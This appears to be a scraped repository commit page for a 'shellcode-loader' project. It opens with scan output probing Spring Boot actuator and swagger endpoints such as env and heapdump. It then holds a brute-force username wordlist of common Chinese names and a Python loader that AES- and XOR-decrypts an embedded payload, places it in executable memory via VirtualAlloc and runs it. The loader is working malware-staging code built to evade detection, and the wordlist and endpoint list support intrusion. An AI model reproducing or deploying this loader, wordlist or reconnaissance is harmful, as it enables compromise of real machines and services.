[-]http://baidu.com/swagger/docs/v3的状态码为200
[-]http://baidu.com/sw/swagger-ui.html的状态码为200
[-]http://baidu.com/template/swagger-ui.html的状态码为200
[-]http://baidu.com/spring-security-rest/api/swagger-ui.html的状态码为200
[-]http://baidu.com/spring-security-oauth-resource/swagger-ui.html的状态码为200
[-]http://baidu.com/mappings的状态码为200
[-]http://baidu.com/actuator/mappings的状态码为200
[-]http://baidu.com/actuator/metrics的状态码为200
[-]http://baidu.com/actuator/beans的状态码为200
[-]http://baidu.com/configprops的状态码为200
[-]http://baidu.com/actuator/configprops的状态码为200
[-]http://baidu.com/actuator的状态码为200
[-]http://baidu.com/autoconfig的状态码为200
[-]http://baidu.com/caches的状态码为200
[-]http://baidu.com/conditions的状态码为200
[-]http://baidu.com/docs的状态码为200
[-]http://baidu.com/dump的状态码为200
[-]http://baidu.com/env的状态码为200
[-]http://baidu.com/flyway的状态码为200
[-]http://baidu.com/health的状态码为200
[-]http://baidu.com/heapdump的状态码为200
[-]http://baidu.com/httptrace的状态码为200
[-]http://baidu.com/info的状态码为200
[-]http://baidu.com/intergrationgraph的状态码为200

BIN
shellcode-loader/setting.ico
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.2 KiB

4
shellcode-loader/test.py
Unescape View File

@ -0,0 +1,4 @@
import os
os.replace("./main_result/main-mini.py","./main_resultone.py")

473
shellcode-loader/user_name.txt
Unescape View File

@ -0,0 +1,473 @@
username
test
test1
test2
test3
testing
tester
admin
admin1
admin2
admin3
login
administrator
system
123456
123456789
12345678
member
guest
user
user1
user2
user3
root
ghost
yangxiu
zhangwei
wangwei
wangfang
liwei
lina
test
admin
system
zhangmin
lijing
wangjing
liuwei
zhangli
wangli
zhangjing
liqiang
wangmin
limin
wanglei
liuyang
wangyan
wangyong
lijun
zhangyong
lijie
zhangjie
zhanglei
wangqiang
lijuan
wangjun
zhangyan
zhangtao
wangtao
liyan
wangchao
liming
liyong
wangjuan
liujie
chengming
chenming
liumin
lixia
lili
zhangjun
wangjie
zhangqiang
wanggang
wangping
liufang
liuyan
liujun
liping
wanghui
chenjing
liuyong
liling
wangdan
ligang
lidan
wangpeng
liutao
chenwei
zhanghua
liujing
litao
wangyuting
lihong
lichao
liuli
zhangpeng
zhangchao
wangling
zhangling
lihua
wangfei
wangying
liuqiang
liying
lihui
limei
chenyong
wang
lifang
libo
yangyong
wangxia
wangbin
lipeng
zhangping
zhanghui
zhangyu
liujuan
libin
wanghao
chenjie
wangkai
chenli
chenmin
zhangbo
zhangying
yangli
zhangjian
wangbo
zhanghong
liudan
li
yangjing
liuchao
zhangjuan
yangfan
liuying
lixue
zhang
wangjian
liuhui
liubo
zhanghao
zhangming
chenyan
zhangxia
yangjie
wangshuai
wangxue
yangjun
zhangxu
liugang
wanghua
yangmin
wangning
lining
liubin
chentao
wangna
zhangbin
chenlong
lilin
wanghong
yangyang
wanglin
chenying
chenjun
liuxia
chenhao
zhangkai
chenfang
yangtao
yangbo
chenhong
liuhuan
chenjuan
chengang
zhanglin
zhangna
liujia
liulei
liupeng
wangxu
zhangxue
liyang
wangmei
liyumei
liuping
yangmei
lifei
wangliang
lilei
wangyu
chenling
zhangshuai
lijian
chenlin
chenqiang
zhaojing
wangcheng
chenchao
chenliang
liuna
wangqin
liuchang
yangyan
zhangliang
liyun
zhangqin
liyuzhen
yangchao
zhangmei
chenping
liuhong
zhaowei
zhangyun
zhangning
yanglin
gaofeng
chenhua
yanghua
yangliu
yangfang
liuling
chenchen
wanghuan
zhanglong
chenbo
chenlei
wangyun
wangfeng
wangrui
liqin
chenpeng
liufei
lihao
zhangdan
lifeng
lijia
chenhui
zhangfang
chenxia
liukai
liuhua
libing
wangdong
yangwei
wanglong
liuming
zhoumin
huangwei
yanglei
zhaomin
chenyun
likai
zhangfeng
lilong
lishuai
lixin
liuyun
chenbin
liyuhua
chenfei
liuhan
huangyong
zhouwei
wangkun
lixiang
zhangrui
liushuai
zhangfei
wangyang
liqiuchen
mali
yangling
yangping
liliang
lirong
wangbing
wangming
chenmei
liufeng
lixiuhua
lidandan
yangxue
wangxin
zhaoli
huangmin
yangjuan
zhoujie
liumei
zhaojun
zhaoyong
liubing
yangbin
liwen
sunwei
liuyu
zhangrong
zhangfan
zhouyong
zhangkun
xuwei
liuqin
zhoujing
xumin
xujing
yanghong
zhangwen
zhouli
machao
wangxiuying
lixiuying
zhangxiuying
wangxiulan
liguiying
wangguiying
zhangxiulan
zhangguiying
wangyulan
lixiulan
zhangyulan
wangguilan
chenxiuying
zhangguilan
liguilan
wangxiuzhen
liyulan
liuxiuying
liuguiying
yangxiuying
lijun4
lixiuzhen
zhangxin
liuyulan
liuguilan
wangting
wangyumei
wangyuzhen
zhangfengying
lifengying
liting
zhangting
wangyuying
zhangyumei
wangfengying
zhangyuying
lihongmei
zhangqian
zhangxiuzhen
wangjianhua
lijianhua
zhangjianhua
liuxin
wangqian
zhangyuzhen
zhanglanying
liqian
wanglanying
chenguiying
wangjianguo
wangjianjun
wangshuzhen
lichunmei
wanghaiyan
lidongmei
wangxiurong
liguizhen
wangxiuyun
wangguirong
wangzhiqiang
zhanghongmei
liufengying
liyuying
wangxiumei
wanglijuan
zhangtingting
wangtingting
wangyuhua
zhangjianguo
lilanying
wangguizhen
lixiumei
chenyulan
zhangyuhua
liuyumei
lijianjun
liuyuzhen
lijianguo
liguirong
liuting
chenxiulan
zhangjianjun
lixiurong
zhangxiumei
lixuemei
zhanghaiyan
wangshulan
lizhiqiang
litingting
zhangxiurong
liujianhua
wanglili
lihaiyan
zhangguirong
liuxiulan
zhangzhiqiang
lixiuyun
lixiufang
zhanglili
zhangxiuyun
wangshuying
wangchunmei
wanghongmei
liguifang
liuhao
huangxiuying
liuyuying
lishuzhen
wangxiufang
wanglihua
wangdandan
wangguixiang
zhangguizhen
wangshuhua
zhangxiufang
zhangguifang
zhanglijuan
wuxiuying
yangming
liguixiang
liuqian
yangxiulan
wangxiuhua
liguizhi
wangguifang
zhangchunmei
wangdongmei
liuyuhua
maxiuying
zhanglihua
zhangshuzhen
lixiaohong
wangguizhi
zhangxiuhua
wangjinfeng
chenjianhua
yangguiying
lishuying
chenyuying
yangxiuzhen
sunxiuying
zhangnan
liuguizhen
liujianjun
zhangshuying
lihongxia
zhaoxiuying
wangjianping
zhangguizhi
wangguihua
liutingting
wanglu
zhangshulan
chenguilan
lishuhua
chenxin
liujianguo
liguihua
wangfenglan
lishulan
chenxiuzhen

11
shellcode-loader/源目录/main-mini.py
Unescape View File

@ -0,0 +1,11 @@
import base64,ctypes
from Crypto.Cipher import AES
kernel32=ctypes.windll.kernel32
def aes_jiemi(s):A='utf8';B=AES.new(b'LeslieCheungKwok',AES.MODE_ECB);return B.decrypt(base64.decodebytes(bytes(s,encoding=A))).rstrip(b'\x00').decode(A)
def xor_jiemi(s,key):
A=''
for B in s:A+=chr(ord(B)^key)
return A
def write_memory(buf):A=len(buf);kernel32.VirtualAlloc.restype=ctypes.c_void_p;B=kernel32.VirtualAlloc(None,A,12288,64);kernel32.RtlMoveMemory.argtypes=ctypes.c_void_p,ctypes.c_void_p,ctypes.c_size_t;kernel32.RtlMoveMemory(B,buf,A);return B
def run(shellcode):A=ctypes.create_string_buffer(shellcode);B=write_memory(A);C=ctypes.cast(B,ctypes.CFUNCTYPE(None));C()
if __name__=='__main__':jiami_sc='aaa123456';sc=xor_jiemi(aes_jiemi(jiami_sc),35);shde=base64.b64decode(sc);run(shde)
Write Preview
Loading…
Cancel
Save